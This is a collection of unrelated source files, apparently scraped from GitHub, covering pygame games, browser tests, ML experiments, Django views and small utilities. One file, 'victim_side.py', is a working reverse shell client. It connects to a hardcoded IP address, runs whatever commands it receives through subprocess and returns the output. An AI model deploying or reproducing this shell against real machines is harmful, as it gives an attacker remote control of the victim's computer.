screen.blit(Background, (0, 0))
screen.blit(basketball, (x, y))
#pygame.draw.line(screen, black, (x + 50, 0), (x + 50, screen_lengte), 2)
#pygame.draw.line(screen, black, (0, y + 50), (screen_widhte, y + 50), 2)
basket_rep_x = [basket_pos_x + 31, basket_pos_x + 94]
basket_rep_y = [basket_pos_y + 14, basket_pos_y + 20]
screen.blit(basket, (basket_pos_x, basket_pos_y))
#pygame.draw.line(screen, black, (basket_pos_x + 31, 0), (basket_pos_x + 31, screen_lengte), 2)
#pygame.draw.line(screen, black, (basket_pos_x + 94, 0), (basket_pos_x + 94, screen_lengte), 2)
#pygame.draw.line(screen, black, (0, basket_pos_y + 14), (screen_widhte, basket_pos_y + 14), 2)
#pygame.draw.line(screen, black, (0, basket_pos_y + 20), (screen_widhte, basket_pos_y + 20), 2)
def check_for_score():
global score
if ball_rep_x in range(basket_rep_x[0], basket_rep_x[1]) and ball_rep_y in range(basket_rep_y[0], basket_rep_y[1]):
score += 1
#tick_2.play()
#tick.play()
tick_3.play()
elif ball_rep_y in range(basket_rep_y[0], basket_rep_y[1]) and ball_rep_x not in range(basket_rep_x[0], basket_rep_x[1]):
score = 0
tick_nope.play()
show_score()
def show_score():
score_disp = font.render("Score: " + str(score), True, black)
screen.blit(score_disp, (text_x, text_y))
print(score)
while play:
clock.tick(60)
screen.fill(white)
check_for_event()
update_ball_pos()
enforce_border()
show_images()
check_for_score()
#pygame.draw.circle(screen, red, [x, y], radius)
# pygame.draw.rect(screen, blue, [200, 200, 50, 100])
pygame.display.flip()
pygame.quit()
| Yash-1047990/pythonProject3 | game.py | game.py | py | 3,998 | python | en | code | 0 | github-code | 13 |
72915472018 | import json
import pytest_bdd as bdd
bdd.scenarios('private.feature')
@bdd.then(bdd.parsers.parse('the cookie {name} should be set to {value}'))
def check_cookie(quteproc, name, value):
"""Check if a given cookie is set correctly.
This assumes we're on the server cookies page.
"""
content = quteproc.get_content()
data = json.loads(content)
print(data)
assert data['cookies'][name] == value
@bdd.then(bdd.parsers.parse('the cookie {name} should not be set'))
def check_cookie_not_set(quteproc, name):
"""Check if a given cookie is not set."""
content = quteproc.get_content()
data = json.loads(content)
print(data)
assert name not in data['cookies']
@bdd.then(bdd.parsers.parse('the file {name} should not contain "{text}"'))
def check_not_contain(tmpdir, name, text):
path = tmpdir / name
assert text not in path.read()
| qutebrowser/qutebrowser | tests/end2end/features/test_private_bdd.py | test_private_bdd.py | py | 886 | python | en | code | 9,084 | github-code | 13 |
17329364699 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Experiment with a gaussian naive bayes model with a variety of balancing techniques on the cleaned data set
"""
__author__ = "John Hoff"
__email__ = "john.hoff@braindonor.net"
__copyright__ = "Copyright 2019, John Hoff"
__license__ = "Creative Commons Attribution-ShareAlike 4.0 International License"
__version__ = "1.0"
from imblearn.combine import SMOTEENN
from imblearn.over_sampling import SMOTE
from imblearn.under_sampling import RandomUnderSampler
from sklearn.naive_bayes import GaussianNB
from utility import Runner
from model import load_clean_sample_data_frame, binned_geo_one_hot_data_mapper
sample = None
fit_increment = 10000
def test_gaussian_naive_bayes():
runner = Runner(
'model/experiment/output/gaussian_naive_bayes_basic',
load_clean_sample_data_frame(),
'arrest',
GaussianNB()
)
runner.run_classification_experiment(
sample=sample,
record_predict_proba=True,
transformer=binned_geo_one_hot_data_mapper,
fit_increment=fit_increment,
n_jobs=1
)
runner = Runner(
'model/experiment/output/gaussian_naive_bayes_under_sampled',
load_clean_sample_data_frame(),
'arrest',
GaussianNB()
)
runner.run_classification_experiment(
sample=sample,
record_predict_proba=True,
transformer=binned_geo_one_hot_data_mapper,
fit_increment=fit_increment,
n_jobs=1,
sampling=RandomUnderSampler()
)
runner = Runner(
'model/experiment/output/gaussian_naive_bayes_over_sampled',
load_clean_sample_data_frame(),
'arrest',
GaussianNB()
)
runner.run_classification_experiment(
sample=sample,
record_predict_proba=True,
transformer=binned_geo_one_hot_data_mapper,
fit_increment=fit_increment,
n_jobs=1,
sampling=SMOTE()
)
runner = Runner(
'model/experiment/output/gaussian_naive_bayes_combine_sampled',
load_clean_sample_data_frame(),
'arrest',
GaussianNB()
)
runner.run_classification_experiment(
sample=sample,
record_predict_proba=True,
transformer=binned_geo_one_hot_data_mapper,
fit_increment=fit_increment,
n_jobs=1,
sampling=SMOTEENN()
)
if __name__ == '__main__':
test_gaussian_naive_bayes()
| theBraindonor/chicago-crime-arrests | model/experiment/gaussian_naive_bayes_model.py | gaussian_naive_bayes_model.py | py | 2,440 | python | en | code | 1 | github-code | 13 |
26053403339 | num=int(input("Enter number: "))
if num<0:
print("Sorry! Enter a positive number. Please try again... ")
else:
sum=0
while(num>0):
sum+=num
num-=1
print("Sum =", sum) | RheaDso/Python | SumOf15nos.py | SumOf15nos.py | py | 212 | python | en | code | 0 | github-code | 13 |
20307800056 | # 크롤링소스
from crawling import *
# 이메일발송소스
from send_email import *
# 메일내용 템플릿 소스
from template_email import *
import json
import datetime
def handler(event=None, context=None):
# 1. 크롤링 정보를 가져오고
data = crawling()
# 2. 현재날짜를 만들고
# hours=9는 추후에 Lambda에 올라갈 예정으로 Lambda 시스템은 기본 UTC를 사용합니다.
# 따라서 한국시간은 9시간을 더합니다.
nowDate = datetime.datetime.now() + datetime.timedelta(hours=9)
report_date = nowDate.strftime('%Y-%m-%d %H:%M:%S')
# 3. 메일내용 템플릿 소스에 2개의 데이터로 치환합니다.
email_body = template_email % (report_date, data)
# 4. 실제 메일을 발송합니다.
rtn = sendNaver(to=[], subject='슈퍼투데이 오늘마감 리포트 (' + report_date + ')', body=email_body)
if rtn == 'OK':
return {
'statusCode': 200,
'body': 'SuperToday Crawling and sending email OK!'
}
else:
return {
'statusCode': 200,
'body': 'Error ' + rtn
}
# handler() | sjworldacademy/easyaws | python-crawling/app.py | app.py | py | 1,172 | python | ko | code | 0 | github-code | 13 |
44266284952 | W = float(input("가로: "))
D = float(input("세로: "))
H = float(input("높이: "))
V = W * D * H
if (V < 0):
print("Error has occurred. Close the program.")
elif (V > 120):
print("It's too heavy.")
else:
print("total lenght: %f" %V)
print("Do you want to calculate the bill? Enter Y/N")
answer = str(input())
if (answer == "N"):
print ("Exit the program.")
else:
if (V <= 80):
print("5$")
elif (80 < V <= 100):
print("8$")
elif (100 < V <= 120):
print("10$")
| hymnstar/cau_oss_python_03 | volume_calc.py | volume_calc.py | py | 571 | python | en | code | 0 | github-code | 13 |
6949031404 | # Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
from typing import *
from collections import deque
class Solution:
def addOneRow(self, root: TreeNode, v: int, d: int) -> TreeNode:
if d==1:
new_root=TreeNode(v)
new_root.left=root
return new_root
que=deque([])
que.append(root)
heads=[]
cnt=1
while que:
len1=len(que)
cnt+=1
heads=[]
for i in range(len1):
heads.append(que.popleft())
if cnt==d:
break
for node in heads:
if node.left:
que.append(node.left)
if node.right:
que.append(node.right)
for head in heads:
l,r=head.left,head.right
head.left,head.right=TreeNode(v),TreeNode(v)
head.left.left=l
head.right.right=r
return root
if __name__ == '__main__':
sol=Solution()
node1=TreeNode(4)
node2=TreeNode(2)
node3=TreeNode(3)
node4=TreeNode(1)
node1.left=node2
node2.left=node3
node2.right=node4
sol.addOneRow(node1,1,3)
| Xiaoctw/LeetCode1_python | 树/在二叉树中增加一行_623.py | 在二叉树中增加一行_623.py | py | 1,289 | python | en | code | 0 | github-code | 13 |
70757049939 | '''
Напишите функцию группового переименования файлов. Она должна:
принимать параметр желаемое конечное имя файлов. При переименовании в конце имени
добавляется порядковый номер.
принимать параметр количество цифр в порядковом номере.
принимать параметр расширение исходного файла. Переименование должно работать
только для этих файлов внутри каталога.
принимать параметр расширение конечного файла.
принимать диапазон сохраняемого оригинального имени. Например для диапазона [3, 6]
берутся буквы с 3 по 6 из исходного имени файла. К ним прибавляется желаемое конечное имя,
если оно передано. Далее счётчик файлов и расширение.
'''
import os
from pathlib import Path
# end_name - параметр <желаемое конечное имя файлов>
# count_serial_number - параметр <количество цифр в порядковом номере>
# source_file_extension - параметр <расширение исходного файла>
# end_file_extension - параметр <расширение конечного файла>
# range_original_name - диапазон <сохраняемого оригинального имени>
def group_renaming_files(dir_path: str, end_name: str, count_serial_number: int,
source_file_extension: str, end_file_extension: str,
range_original_name: tuple):
file_list = os.listdir( dir_path)
file = ()
f_count = 0
for file in file_list:
file_name, file_ext = file.split('.')
if file_ext != source_file_extension:
continue
else:
file_ext = end_file_extension
file_name = f'{file_name[range_original_name[0]:range_original_name[1]]}'
file_name = f'{file_name + end_name}_{f_count + 1:0{count_serial_number}}{file_ext}'
f_count += 1
print(f'{file} -> {file_name}')
os.rename(os.path.join(dir_path, file), os.path.join(dir_path, file_name))
text = ''
if f_count == 1:
text = 'файл переименован по шаблону'
elif f_count == 2 or f_count == 3 or f_count == 4:
text = 'файла переименованы по шаблону'
else:
text = 'файлов переименованы по шаблону'
return f'{f_count} {text} '
if __name__=='__main__':
print(group_renaming_files('test_dir', end_name='_replacement', count_serial_number=2,\
source_file_extension='txt', end_file_extension='.xls', range_original_name=(0,3)))
'''
result:
data.txt -> dat_replacement_01.xls
file_01.txt -> fil_replacement_02.xls
notepad.txt -> not_replacement_03.xls
3 файла переименованы по шаблону
''' | leonid-korolev/Immersion_in_Python_homeworks | homeworks/homework_7/renaming_files.py | renaming_files.py | py | 3,383 | python | ru | code | 0 | github-code | 13 |
8815555050 | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def preorderTraversal(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
res = []
if not root:
return res
frontier = [root]
while frontier:
expand = frontier.pop()
res.append(expand.val)
for child in [expand.right, expand.left]:
if child:
frontier.append(child)
return res
| rando3/leetcode-python | Stacks and Queues/preorderTraversal.py | preorderTraversal.py | py | 639 | python | en | code | 0 | github-code | 13 |
27061728320 | import logging
import numpy as np
import pandas as pd
import streamlit as st
from bertopic import BERTopic
from bertopic.backend._utils import select_backend
from sentence_transformers import SentenceTransformer
from topics.np import load_numpy
logging.getLogger(__name__).addHandler(logging.NullHandler())
def _filter_dataframe(df, column="Topic", values=None):
if values is None:
values = [-1] # Remove this index
return df[df[column].isin(values) == False]
def _sort_probabilities_by_topic(probs: np.ndarray):
highest_probs_per_idx = []
_shape = probs.shape
num_vals = range(len(probs))
num_topics = 1 if len(_shape) == 1 else _shape[1]
for topic in range(num_topics):
prob = probs[:, topic]
probs_sorted = sorted(num_vals, reverse=True, key=lambda idx: prob[idx])
highest_probs_per_idx.append(probs_sorted)
return np.array(highest_probs_per_idx).T
def _remove_first_underline(df: pd.DataFrame, column: str = "Name"):
df[column] = df.apply(lambda d: " ".join(d[column].split("_")[1:]), axis=1)
return df
def replace_symbol(df: pd.DataFrame, column: str = "Name", find="", rep=""):
df[column] = df.apply(lambda d: d[column].replace(find, rep), axis=1)
return df
def _remove_underlines(df: pd.DataFrame, column: str = "Name"):
df = _remove_first_underline(df, column=column)
df = replace_symbol(df, column, "_", " ")
return df
# -------
@st.cache(allow_output_mutation=True)
def get_df(input_data="biblioteksplaner.csv"):
df = pd.read_csv(input_data)
df = df.astype(str)
df.drop(columns="meta", inplace=True)
return df
@st.cache(allow_output_mutation=True)
def get_topics(model_path="models/model_mp_30/"):
return load_numpy(model_path + "topics.npy", as_list=True)
@st.cache(allow_output_mutation=True)
def get_probs(model_path="models/model_mp_30/"):
return load_numpy(model_path + "probs.npy", as_list=False)
@st.cache(allow_output_mutation=True)
def get_probs_index_by_topic(model_path="models/model_mp_30/"):
probs = load_numpy(model_path + "probs.npy", as_list=False)
return _sort_probabilities_by_topic(probs)
@st.cache(allow_output_mutation=True)
def get_topics_per_region(model_path="models/model_mp_30/"):
topics_per_region = pd.read_csv(model_path + "topics_per_region.csv")
return _filter_dataframe(topics_per_region)
@st.cache(allow_output_mutation=True)
def get_topics_per_municipality(model_path="models/model_mp_30/"):
topics_per_municipality = pd.read_csv(model_path + "topics_per_municipality.csv")
return _filter_dataframe(topics_per_municipality)
@st.cache(allow_output_mutation=True)
def get_topic_model(model_path="models/model_mp_30/"):
# model = SentenceTransformer(model_path) # , device="cpu")
# logging.error("Loaded SentenceTransformer")
# model = select_backend(sentence_model)
logging.info("Loading BERTopic")
topic_model = BERTopic.load(model_path + "model") # , embedding_model=model)
logging.info("Loaded BERTopic")
return topic_model
@st.cache(allow_output_mutation=True)
def get_topic_info(model_path):
# Columns = (Topic, Count, Name)
topic_model = get_topic_model(model_path=model_path)
df: pd.DataFrame = topic_model.get_topic_info()
df = _remove_first_underline(df, "Name")
df = _filter_dataframe(df)
df = df[["Topic", "Name", "Count"]] # original name from topic_info
df.rename(
columns={"Topic": "Topic", "Name": "Words", "Count": "Frequency"},
inplace=True,
)
df.reset_index(inplace=True, drop=True)
return df
| MarkusSagen/paai_skr_demo | web/initialize.py | initialize.py | py | 3,614 | python | en | code | 0 | github-code | 13 |
24889833165 | import os, socket, sys, subprocess
from threading import Thread
from colorama import Fore
# Server details
SERVER_HOST = "192.168.1.68"
SERVER_PORT = 4000
seperator_token = "<SEP>"
GREEN = Fore.GREEN
YELLOW = Fore.YELLOW
RED = Fore.RED
RESET = Fore.RESET
s = socket.socket()
s.connect((SERVER_HOST, SERVER_PORT))
cwd = os.getcwd()
s.send(cwd.encode())
command = ""
while command.lower() != "exit":
cwd = os.getcwd()
command = s.recv(1024).decode()
splitted_command = command.split()
if len(splitted_command) > 0 and splitted_command[0].lower() == "cd":
try:
os.chdir(' '.join(splitted_command[1:]))
cwd = os.getcwd()
s.send(f"{YELLOW}{''}<SEP>{GREEN}{cwd}{RESET}".encode())
except Exception as e:
s.send(f"{RED}Error: {e}{RESET}".encode())
else:
try:
output = subprocess.getoutput(command)
s.send(f"{YELLOW}{output}{RESET}<SEP>{GREEN}{cwd}{RESET}".encode())
except Exception as e:
s.send(f"{RED}Error: {e}{RESET}".encode())
output = ""
sys.exit() | rip4ldi/hacker-tools | reverse_shell/victim_side.py | victim_side.py | py | 1,116 | python | en | code | 0 | github-code | 13 |
35981698272 | # -*- coding: UTF-8 -*-
# author:@Jack.Wang
from threading import *
from queue import Queue, Empty
class EventManager:
def __init__(self):
self.__eventQueue = Queue()
self.__active = False
self.__thread = Thread(target=self.__Run)
# 这里的__handlers是一个字典,用来保存对应的事件的响应函数
# 其中每个键对应的值是一个列表,列表中保存了对该事件监听的响应函数,一对多
self.__handlers = {}
def __Run(self):
while self.__active == True:
try:
event = self.__eventQueue.get(block=True, timeout=1)
self.__EventProcess(event)
except Empty:
pass
# print('Queue Empty')
def Start(self):
self.__active = True
self.__thread.start()
def __EventProcess(self, event):
if event.type_ in self.__handlers:
for handler in self.__handlers[event.type_]:
handler(event)
def Stop(self):
self.__active = False
self.__thread.join()
def AddEventLister(self, type_, handler):
try:
handlerList = self.__handlers[type_]
except KeyError:
handlerList = []
self.__handlers[type_] = handlerList
if handler not in handlerList:
self.__handlers[type_].append(handler)
# print(str(handler) + '添加进dict' + str(type_))
# handlerList.append(handler)
def RemoveEventListerner(self, type_, handler):
try:
handlerList = self.__handlers[type_]
if handler in handlerList:
self.__handlers[type_].remove(handler)
if not handlerList:
del self.__handlers[type_]
except KeyError:
pass
def SendEvent(self, event):
self.__eventQueue.put(event)
class Event:
def __init__(self, type_=None):
self.type_ = type_
self.dict = {} | wangyundlut/Futures_Quant | EventEngine/EventEngine.py | EventEngine.py | py | 2,005 | python | en | code | 1 | github-code | 13 |
42045622698 | import sys
import itertools
sys.setrecursionlimit(10 ** 8)
ini = lambda: int(sys.stdin.readline())
inl = lambda: [int(x) for x in sys.stdin.readline().split()]
ins = lambda: sys.stdin.readline().rstrip()
debug = lambda *a, **kw: print("\033[33m", *a, "\033[0m", **dict(file=sys.stderr, **kw))
def solve():
v = inl()
seen = [False] * 501
for x in itertools.combinations(v, 3):
seen[sum(x)] = True
xs = [i for i, v in enumerate(seen) if v]
xs.reverse()
return xs[2]
print(solve())
| keijak/comp-pub | atcoder/abc028/C/main.py | main.py | py | 516 | python | en | code | 0 | github-code | 13 |
3082393025 | import pytest
from django.core.exceptions import ValidationError
from dataservices import models
from dataservices.tests.factories import (
CIAFactBookFactory,
ConsumerPriceIndexFactory,
CountryFactory,
EaseOfDoingBusiness,
GDPPerCapitaFactory,
IncomeFactory,
InternetUsageFactory,
MetadataFactory,
SuggestedCountriesFactory,
WorldEconomicOutlookByCountryFactory,
)
@pytest.mark.django_db
@pytest.mark.parametrize(
'factory',
(
ConsumerPriceIndexFactory,
EaseOfDoingBusiness,
GDPPerCapitaFactory,
IncomeFactory,
InternetUsageFactory,
),
)
@pytest.mark.django_db
def test_model_to_str(factory):
create_model = factory()
assert str(create_model) == f'{create_model.country.name}:{create_model.year}'
@pytest.mark.django_db
def test_suggested_country_hs_code():
country = SuggestedCountriesFactory()
assert str(country) == str(country.hs_code)
@pytest.mark.django_db
def test_cia_factbook_country_name():
country = CIAFactBookFactory()
assert str(country) == country.country_name
@pytest.mark.django_db
def test_world_economic_outlook_by_country_is_projection():
non_projected = WorldEconomicOutlookByCountryFactory(year=1999, estimates_start_after=2000)
assert non_projected.is_projection is False
non_projected = WorldEconomicOutlookByCountryFactory(year=2000, estimates_start_after=2000)
assert non_projected.is_projection is False
projected = WorldEconomicOutlookByCountryFactory(year=2001, estimates_start_after=2000)
assert projected.is_projection is True
@pytest.mark.django_db
def test_metadata_view_name():
metadata = MetadataFactory(view_name='MyView')
assert str(metadata) == 'MyView'
@pytest.mark.django_db
def test_uk_free_trade_agreement_no_name():
fta = models.UKFreeTradeAgreement()
with pytest.raises(ValidationError):
fta.clean_fields()
fta.country = CountryFactory()
assert fta.name == ''
fta.clean_fields()
assert fta.name == fta.country.name
| uktrade/directory-api | dataservices/tests/test_models.py | test_models.py | py | 2,060 | python | en | code | 3 | github-code | 13 |
12405806694 | from django.shortcuts import render,redirect
from django.http import Http404
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth.decorators import login_required
from .models import Profile,Project,Rating
from .forms import UploadProjectForm,AddProfileForm,AddRatingForm
from .filters import ProjectFilter
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework import status
from .serializer import ProfileSerializer,ProjectSerializer
from .permissions import IsAdminOrReadOnly,IsAuthenticatedOrReadOnly
# Create your views here.
def home(request):
project=Project.objects.first()
return render(request,'home.html', {"project":project})
def about(request):
return render(request, 'about.html')
@login_required(login_url='/accounts/login/')
def project(request):
projects = Project.objects.all()
return render(request, 'project.html',{"projects":projects})
@login_required(login_url='/accounts/login/')
def projectdetail(request, project_id):
try:
project = Project.objects.get(id=project_id)
except ObjectDoesNotExist:
raise Http404()
return render(request,'projectdetail.html', {"project": project})
@login_required(login_url='/accounts/login/')
def uploadproject(request):
current_user= request.user
if request.method == 'POST':
form = UploadProjectForm(request.POST, request.FILES)
if form.is_valid():
new_project = form.save(commit=False)
new_project.owner = current_user
new_project.save()
return redirect('project')
else:
form=UploadProjectForm()
return render(request,'newproject.html',{"form":form})
@login_required(login_url='/accounts/login/')
def viewprofile(request):
current_user = request.user
profile = Profile.objects.filter(user = current_user)
projects = Project.objects.filter(owner = current_user)
return render(request, 'profile.html',{"current_user":current_user, "profile":profile, "projects":projects})
@login_required(login_url='/accounts/login/')
def addprofile(request):
current_user = request.user
if request.method == 'POST':
form = AddProfileForm(request.POST, request.FILES)
if form.is_valid():
new_profile = form.save(commit=False)
new_profile.user = current_user
new_profile.save()
return redirect('profile')
else:
form=AddProfileForm()
return render(request,'newprofile.html',{"form":form})
@login_required(login_url='/accounts/login/')
def filterproject(request):
if request is None:
return Project.objects.none()
filter_list = Project.objects.all()
project_filter = ProjectFilter(request.GET, queryset = filter_list)
return render(request,'searchproject.html',{"filter":project_filter})
@login_required(login_url='/accounts/login/')
def addrating(request,project_id):
project = Project.objects.get(id = project_id)
current_user = request.user
form = AddRatingForm()
if request.method == 'POST':
form = AddRatingForm(request.POST)
if form.is_valid():
design = form.cleaned_data.get("design")
usability = form.cleaned_data.get("usability")
content = form.cleaned_data.get("content")
new_rating = Rating(design=design, usability=usability, content=content, human=current_user, project=project)
new_rating.save()
return redirect('project')
else:
form = AddRatingForm()
return render(request, 'rating.html',{'form':form,'project':project,'current_user':current_user})
@login_required(login_url='/accounts/login/')
def calcratings(request, project_id):
primer = Project.objects.get(id=project_id)
ratings = Rating.objects.filter(project=primer)
proscore = Project.score(project_id)
designscore = Project.designer(project_id)
usabilityscore = Project.usable(project_id)
contentscore = Project.contenter(project_id)
return render(request,'score.html', {"primer":primer,"ratings":ratings,"proscore":proscore, "designscore":designscore,"usabilityscore":usabilityscore,"contentscore":contentscore})
class ProjectList(APIView):
permission_classes = (IsAuthenticatedOrReadOnly,)
def get(self, request, format=None):
all_projects = Project.objects.all()
serializers=ProjectSerializer(all_projects, many=True)
return Response(serializers.data)
def post(self, request, format=None):
serializers = ProjectSerializer(data=request.data)
if serializers.is_valid():
serializers.save()
return Response(serializers.data, status=status.HTTP_201_CREATED)
return Response(serializers.errors, status=status.HTTP_400_BAD_REQUEST)
class ProfileList(APIView):
permission_classes = (IsAdminOrReadOnly,)
def get(self, request, format=None):
all_profiles = Profile.objects.all()
serializers=ProfileSerializer(all_profiles, many=True)
return Response(serializers.data)
def post(self, request, format=None):
serializers = ProfileSerializer(data=request.data)
if serializers.is_valid():
serializers.save()
return Response(serializers.data, status=status.HTTP_201_CREATED)
return Response(serializers.errors, status=status.HTTP_400_BAD_REQUEST)
class ProjectDescription(APIView):
permission_classes = (IsAuthenticatedOrReadOnly)
def get_project(self,pk):
try:
return Project.objects.get(pk=pk)
except Project.DoesNotExist:
return Http404
def get(self, request, pk, format=None):
project = self.get_project(pk)
serializers = ProjectSerializer(project)
return Response(serializers.data)
class ProfileDescription(APIView):
permission_classes = (IsAdminOrReadOnly,)
def get_profile(self,pk):
try:
return Profile.objects.get(pk=pk)
except Profile.DoesNotExist:
return Http404
def get(self, request, pk, format=None):
project = self.get_profile(pk)
serializers = ProfileSerializer(project)
return Response(serializers.data)
| Dachoka3000/colone | work/views.py | views.py | py | 6,288 | python | en | code | 0 | github-code | 13 |
2426926203 | #Imports random, pickle, pygame and time modules
import random, pickle, pygame, time
#Imports locals for use in adding input
from pygame.locals import *
#Initialize pygame
pygame.init()
#Initialises pygame music mixer
pygame.mixer.init()
#Loads music file
pygame.mixer.music.load('floyd.ogg')
#Plays song indefinitely
pygame.mixer.music.play(-1)
#Set variables for width and height of window
width = 1200
height = 600
#Set colours in variables
black = (0,0,0)
white = (255,255,255)
aqua_blue = (113,221,229)
#Initialise variables
num_ques = 0
used_questions = []
overall_score = 0
song_time = 0
#Create screen in window
screen = pygame.display.set_mode((width,height))
#Set caption of window
pygame.display.set_caption("IQ Test")
#Get clock
clock = pygame.time.Clock()
#Set FPS variable
FPS = 60
#Set variable for FPS clock
playtime = 0.0
ticks = clock.tick(FPS)
#Opens file using name and mode
def open_file(name, mode):
'''Opens file'''
#Tries to open file
try:
iq_file = open(name, mode)
#Will print this out if IOError is recieved
except IOError as e:
print("The file {0} does not exist.\n{1}".format(name,e))
input("\n\nPress enter to exit the program. ")
sys.exit()
else:
#Returns trivia_file
return iq_file
#reads next line of the file
def next_line(iq_file):
'''Reads next line of file'''
line = iq_file.readline()
return line
def text_objects(text, font):
'''Renders text'''
#Creates surface with rendered text
textSurface = font.render(text, True, black)
#Returns surface and rectangle of surface
return textSurface, textSurface.get_rect()
#Display Text
def display_text(text, width, height, size):
'''Displays text'''
#Gets font and size and puts in variable
size_text = pygame.font.Font("futura.ttf", size)
#Gets text surface and and rectangle
TextSurf, TextRect = text_objects(text, size_text)
#Centers the text in the rectangle
TextRect.center = ((width),(height))
#Blits text surface and rectangle
screen.blit(TextSurf, TextRect)
#Button
def button(x, y, width, height, text, text_width, text_height, text_size, button):
'''Creates button'''
#Gets mouse position
mouse_pos = pygame.mouse.get_pos()
#Gets whether mouse button has been pressed
click = pygame.mouse.get_pressed()
#Draws rectangle for button
pygame.draw.rect(screen, black, [x, y, width, height], 2)
#Displays text within button
display_text(text, text_width, text_height, text_size)
#Checks if mouse position is within boundaries of button
if x+width > mouse_pos[0] > x and y+height > mouse_pos[1] > y:
#Draws the box in aqua blue
pygame.draw.rect(screen, aqua_blue, [x, y, width, height], 2)
#If left clicked
if click[0] == 1:
#Checks what destination button desires
#if start
if button == "s":
#Resets time
global time_left
time_left = 201.0
#Slight delay so button on next screen isn't accidentally clicked
time.sleep(0.2)
#Starts quiz function
quiz()
#If menu
elif button == "m":
#Delay
time.sleep(0.2)
#Starts menu function
menu()
#If high scores
elif button == "hs":
#Delay
time.sleep(0.2)
#Starts high scores function
high_scores()
#If correct
elif button == "c":
#adds 10 to overall score
global overall_score
overall_score = overall_score + 10
#Delay
time.sleep(0.2)
#Starts quiz function
quiz()
#If wrong
elif button == "w":
#Delay
time.sleep(0.2)
#Starts quiz function
quiz()
#Pauses music and gets position stopped at
elif button == "pa":
pygame.mixer.music.pause()
global song_time
song_time = song_time + pygame.mixer.music.get_pos()
#Plays music from stopped position
elif button == "pl":
pygame.mixer.music.play(-1, song_time)
#If quit
elif button == "q":
#Quits pygame then closes window
pygame.quit()
quit()
#Maths question
def maths_question():
'''Generates math question'''
#Makes list of operators
operators = ["*", "/", "+", "-"]
#Chooses random operator
operator = random.choice(operators)
#Generates random numbers for questions
num1 = random.randint(0, 100)
num2 = random.randint(0, 100)
num3 = random.randint(1, 20)
num4 = random.randint(1, 20)
#Chooses number to be used as the correct choice
correct_choice = random.randint(0, 3)
#Creates a list of random numbers to be used as wrong answers
wrong_list = []
for x in range(4):
wrong = random.randint(0, 200)
wrong_list.append(wrong)
#Boolean value for while loop
math = True
while math:
#Makes time left a float and takes away ticks/1860
global time_left
time_left = float(time_left)
time_left = time_left - ticks/1860.0
#String slice to get rid of decimals except for last 10 seconds
if 10 <= time_left < 100:
display_time = (str(time_left))[0:2]
else:
display_time = (str(time_left))[0:3]
for event in pygame.event.get():
#Quits game if "X" is clicked
if event.type == pygame.QUIT:
pygame.quit()
quit()
#Fills screen white
screen.fill(white)
#Buttons to pause/play music
button(((9*width)/10)-200, ((9*height)/10)-25, 100, 50, "Pause", ((9*width)/10)-150, ((9*height)/10), 30, "pa")
button(((9*width)/10)-50, ((9*height)/10)-25, 100, 50, "Play", ((9*width)/10), ((9*height)/10), 30, "pl")
#Draws black box on screen in left corner for timer
pygame.draw.rect(screen, black, [(width/10)-50, (height/10)-15, 100, 30], 2)
#Displays time left in box
display_text(display_time, (width/10), (height/10), 30)
#If branch determining question to display depending on the operator chosen
if operator == "*":
#Formats question in a string
question = "What is the result of {0} X {1}?".format(num3,num4)
#Displays question at top of window
display_text(question, (width/2), (height/6), 50)
#Works out correct answer
correct = num3*num4
elif operator == "/":
question = "What is the result of {0} / {1}?".format(num3,num4)
display_text(question, (width/2), (height/6), 50)
correct = num3/num4
elif operator == "+":
question = "What is the result of {0} + {1}?".format(num1,num2)
display_text(question, (width/2), (height/6), 50)
correct = num1+num2
else:
question = "What is the result of {0} - {1}?".format(num1,num2)
display_text(question, (width/2), (height/6), 50)
correct = num1-num2
#for each loop creates a button
for i in range(4):
#Creates the correct button at correct_choice position and ensures button is correct if wrong answers generate correct answer
if i == correct_choice or correct in wrong_list:
answer = "{0}) {1}".format(i+1, correct)
button((width/2)-150, (height/3)-25+i*100, 300, 50, answer, (width/2), (height/3)+i*100, 30, "c")
#Creates wrong button at other positions
else:
answer = "{0}) {1}".format(i+1, wrong_list[i])
button((width/2)-150, (height/3)-25+i*100, 300, 50, answer, (width/2), (height/3)+i*100, 30, "w")
#updates display every loop
pygame.display.update()
#Text question
def text_question(iq_file):
#Resets used questions for every new section out of text sections
if num_ques == 11 or num_ques == 16 or num_ques == 21 or num_ques == 26 or num_ques == 31:
global used_questions
used_questions = []
#chooses random number for question
rand_num = random.randint(0,9)
#Will choose a new number if number already used
while rand_num in used_questions:
rand_num = random.randint(0,9)
#Appends number to used
used_questions.append(rand_num)
#Ensures loop starts
ques_num = -1
while ques_num != rand_num:
#Reads question from file and puts in variable
question = next_line(iq_file)
#Gets rid of newline char
if question:
question = question[:-1]
#Puts the 4 answers in a list
answers = []
for i in range(4):
answer = next_line(iq_file)
#Gets rid of newline char
if answer:
answer = answer[:-1]
#Puts answers in a list
answers.append(answer)
#Reads correct answer puts in a variable
correct = next_line(iq_file)
#Gets rid of newline char
if correct:
correct = correct[0]
correct = int(correct)
#Reads points from file and puts in variable
points = next_line(iq_file)
#Converts to int
if points:
points = int(points)
#Adds one to ques_num
ques_num += 1
#Resets file back to first line
iq_file.seek(0)
#Prints question and answers
#Sets up True value for loop
text = True
while text:
global time_left
time_left = float(time_left)
#Makes time left a float and takes away ticks/1860
time_left = time_left - ticks/1860.0
#String slicing to get rid of decimals except for last 10 seconds
if 10 <= time_left < 100:
display_time = (str(time_left))[0:2]
else:
display_time = (str(time_left))[0:3]
#Will call time out function if time_left is less than or equal to 0
if time_left <= 0:
time_out()
for event in pygame.event.get():
#Will quit if "X" is pressed
if event.type == pygame.QUIT:
pygame.quit()
quit()
#Fills screen with white
screen.fill(white)
#Buttons to pause/play music
button(((9*width)/10)-200, ((9*height)/10)-25, 100, 50, "Pause", ((9*width)/10)-150, ((9*height)/10), 30, "pa")
button(((9*width)/10)-50, ((9*height)/10)-25, 100, 50, "Play", ((9*width)/10), ((9*height)/10), 30, "pl")
#Draws rectangle for timer
pygame.draw.rect(screen, black, [(width/10)-50, (height/10)-15, 100, 30], 2)
#Displays timer in box
display_text(display_time, (width/10), (height/10), 30)
#Displays question at top of window size 50 text
display_text(question, (width/2), (height/6), 50)
#Loops 4 times
